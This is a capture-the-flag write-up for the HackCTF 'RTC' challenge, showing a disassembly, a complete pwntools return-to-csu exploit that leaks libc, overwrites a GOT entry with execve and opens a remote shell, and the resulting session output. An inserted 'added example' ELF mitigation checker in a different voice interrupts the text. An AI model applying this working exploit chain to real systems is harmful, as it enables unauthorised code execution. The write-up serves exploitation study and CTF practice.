
[HackCTF] RTC

Intro

Hello :D

This time it's the famous, famous Return to csu problem.

I've used this technique so many times I could do it with my eyes closed haha

Let's get started!!

Write UP

   0x000000000040061c <+38>:    mov    edx,0x15
   0x0000000000400621 <+43>:    mov    esi,0x4006e4
   0x0000000000400626 <+48>:    mov    edi,0x1
   0x000000000040062b <+53>:    mov    eax,0x0
   0x0000000000400630 <+58>:    call   0x4004b0 <write@plt>
   0x0000000000400635 <+63>:    lea    rax,[rbp-0x40]
   0x0000000000400639 <+67>:    mov    edx,0x200
   0x000000000040063e <+72>:    mov    rsi,rax
   0x0000000000400641 <+75>:    mov    edi,0x0
   0x0000000000400646 <+80>:    mov    eax,0x0
   0x000000000040064b <+85>:    call   0x4004c0 <read@plt>
   0x0000000000400650 <+90>:    nop
   0x0000000000400651 <+91>:    leave
   0x0000000000400652 <+92>:    ret
End of assembler dump.

It's the read()/write() binary we saw in ropasaurusrex. Even the BOF in read() is the same lol

Given that the challenge is named RTC, you can infer that there is no rdx gadget, so it's a problem you solve by going through csu.

I've explained return to csu plenty of times already.. so let's go straight to the code.
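The chain below only works because two mitigations are absent: the GOT must be writable (no Full RELRO, since step 3 overwrites write's GOT entry) and the __libc_csu_init gadget addresses must be fixed (no PIE, since csu0/csu1 are hard-coded). As an added example that is not part of the original write-up, here is a small ELF64 header checker that reports exactly those properties (plus NX) from the program headers and dynamic tags. The constants come from the ELF ABI; the images it inspects are constructed inline as test data, not the RTC binary itself.

```python
# Added example (not from the original write-up): check an ELF64 image for the
# properties a GOT-overwrite ret2csu chain relies on: a writable GOT (no Full
# RELRO) and fixed __libc_csu_init gadget addresses (no PIE), plus NX.
# Constants are from the ELF ABI; the sample images below are constructed test data.
import struct

ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
DT_NULL, DT_FLAGS, DT_FLAGS_1 = 0, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def parse_elf64(blob):
    """Return (e_type, program headers, dynamic tags) of a little-endian ELF64 image."""
    if blob[:4] != b"\x7fELF" or blob[4] != 2:  # EI_CLASS must be ELFCLASS64
        raise ValueError("not an ELF64 image")
    e_type = struct.unpack_from("<H", blob, 16)[0]
    e_phoff = struct.unpack_from("<Q", blob, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", blob, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            "<IIQQQQQQ", blob, e_phoff + i * e_phentsize)
        phdrs.append({"type": p_type, "flags": p_flags, "offset": p_offset, "filesz": p_filesz})
    dyn = {}
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        pos, end = ph["offset"], ph["offset"] + ph["filesz"]
        while pos + 16 <= end:  # each Elf64_Dyn is a signed tag plus a value
            d_tag, d_val = struct.unpack_from("<qQ", blob, pos)
            if d_tag == DT_NULL:
                break
            dyn[d_tag] = d_val
            pos += 16
    return e_type, phdrs, dyn


def assess(blob):
    """Summarise the mitigations that matter for a GOT-overwrite ret2csu chain."""
    e_type, phdrs, dyn = parse_elf64(blob)
    by_type = {ph["type"]: ph for ph in phdrs}
    bind_now = bool(dyn.get(DT_FLAGS, 0) & DF_BIND_NOW or dyn.get(DT_FLAGS_1, 0) & DF_1_NOW)
    if PT_GNU_RELRO in by_type:
        relro = "full" if bind_now else "partial"
    else:
        relro = "none"
    stack = by_type.get(PT_GNU_STACK)
    pie = e_type == ET_DYN
    return {
        "pie": pie,
        "relro": relro,
        "nx": stack is not None and not stack["flags"] & PF_X,
        "got_writable": relro != "full",   # the GOT-overwrite step needs this
        "fixed_csu_gadgets": not pie,      # hard-coded csu0/csu1 need this
    }


def build_sample_elf(e_type, relro, bind_now, exec_stack):
    """Construct a minimal, non-runnable ELF64 image with the requested headers (test data)."""
    segs = [(PT_GNU_STACK, PF_X if exec_stack else 0)]
    if relro:
        segs.append((PT_GNU_RELRO, 0))
    dyn_tags = ([(DT_FLAGS, DF_BIND_NOW)] if bind_now else []) + [(DT_NULL, 0)]
    dyn_bytes = b"".join(struct.pack("<qQ", t, v) for t, v in dyn_tags)
    phnum = len(segs) + 1  # plus one PT_DYNAMIC header
    dyn_off = 64 + phnum * 56
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0, 64, 56, phnum, 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in segs)
    phdrs += struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, dyn_off, 0, 0, len(dyn_bytes), len(dyn_bytes), 8)
    return ehdr + phdrs + dyn_bytes


if __name__ == "__main__":
    # Layout the chain below assumes: non-PIE, partial RELRO, NX stack.
    print("chain-friendly:", assess(build_sample_elf(ET_EXEC, True, False, False)))
    # Hardened build: PIE + Full RELRO, so the GOT is read-only and csu addresses move.
    print("hardened:     ", assess(build_sample_elf(ET_DYN, True, True, False)))
```

To run it on a real file, pass `open(path, "rb").read()` to `assess()`. Full RELRO is reported only when a PT_GNU_RELRO segment is present and the dynamic section asks for immediate binding (DF_BIND_NOW or DF_1_NOW), which is the condition under which the loader remaps the GOT read-only before main() runs.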

from pwn import *

#context.log_level = "debug"

#p = process("./rtc")
p = remote("ctf.j0n9hyun.xyz", 3025)

payload = b""

read_got = 0x601020
write_got = 0x601018
csu0 = 0x4006b6   # __libc_csu_init: add rsp,8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
csu1 = 0x4006a0   # __libc_csu_init: mov rdx,r13 ; mov rsi,r14 ; mov edi,r15d ; call [r12+rbx*8]
offset = 0x2ab40  # write - execve in the remote libc
bss = 0x601050 + 0x100

p.recvuntil(b"?\n")

# 0x40-byte buffer at rbp-0x40 plus the saved rbp, then return into csu0
payload += b"A" * 72
payload += p64(csu0)

# 1) read(0, bss, 8): put "/bin/sh\x00" into .bss
payload += b"A" * 8        # eaten by add rsp,8
payload += p64(0)          # rbx
payload += p64(1)          # rbp: rbx+1 == rbp, so csu1 falls through after one call
payload += p64(read_got)   # r12: called as [r12 + rbx*8]
payload += p64(8)          # r13 -> rdx
payload += p64(bss)        # r14 -> rsi
payload += p64(0)          # r15 -> edi
payload += p64(csu1)

# 2) write(1, write_got, 8): leak the libc address of write
payload += b"A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_got)
payload += p64(1)
payload += p64(csu1)

# 3) read(0, write_got, 8): overwrite write's GOT entry with execve
payload += b"A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_got)
payload += p64(0)
payload += p64(csu1)

# 4) [write_got] now points at execve: execve(bss, 0, 0)
payload += b"A" * 8
payload += p64(0)
payload += p64(1)
payload += p64(write_got)
payload += p64(0)
payload += p64(0)
payload += p64(bss)
payload += p64(csu1)

p.send(payload)

p.send(b"/bin/sh\x00")        # consumed by step 1

write_addr = u64(p.recv(8))   # leaked by step 2
log.info("write_addr = " + hex(write_addr))

execve_addr = write_addr - offset
log.info("execve_addr = " + hex(execve_addr))

p.send(p64(execve_addr))      # consumed by step 3

p.interactive()

[+] Opening connection to ctf.j0n9hyun.xyz on port 3025: Done
[*] write_addr = 0x7f4e05cbc2b0
[*] execve_addr = 0x7f4e05c91770
[*] Switching to interactive mode
$ ls
flag
main
$ cat flag
// flag!!!

Exploit!!

Wrap-up

Such an easy problem for 350 points.. I'll move on quickly haha

Thank you :D